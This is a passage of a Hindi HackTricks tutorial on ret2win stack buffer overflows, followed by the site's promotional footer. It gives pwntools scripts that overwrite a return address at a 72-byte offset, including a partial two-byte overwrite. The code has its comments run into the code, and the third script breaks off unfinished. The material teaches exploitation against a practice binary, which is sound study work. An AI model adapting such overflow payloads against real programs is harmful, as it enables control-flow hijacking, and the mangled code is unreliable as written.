from pwn import*# Configurationbinary_name ='./ret2win'p =process(binary_name)# Prepare the payloadoffset =72ret2win_addr =p64(0x00000000004006c4)payload =b'A'* offset + ret2win_addr# Send the payloadp.send(payload)# Check responseprint(p.recvline())p.close()
ऑफ-बाई-1
वास्तव में, यह ज्यादा तरह से एक ऑफ-बाई-2 होने जा रहा है जो स्टोर्ड पीसी में है। हम सभी वापसी पता ओवरराइट करने की बजाय केवल आखिरी 2 बाइट को 0x06c4 के साथ ओवरराइट करेंगे।
from pwn import*# Configurationbinary_name ='./ret2win'p =process(binary_name)# Prepare the payloadoffset =72ret2win_addr =p16(0x06c4)payload =b'A'* offset + ret2win_addr# Send the payloadp.send(payload)# Check responseprint(p.recvline())p.close()
हमें विजयी फ़ंक्शन का सटीक पता नहीं है बिना लीक के, लेकिन हम फ़ंक्शन का ऑफसेट बाइनरी से जान सकते हैं और जानते हैं कि हम ओवरराइट कर रहे हैं वापसी पता पहले से ही एक करीबी पते पर है, इससे विजयी फ़ंक्शन (0x7d4) का ऑफसेट लीक करना संभव है इस मामले में और बस उस ऑफसेट का उपयोग करें:
```python from pwn import *
Configuration
binary_name = './ret2win' p = process(binary_name)
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए:
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** HackTricks और HackTricks Cloud github repos में PR जमा करके।
</details>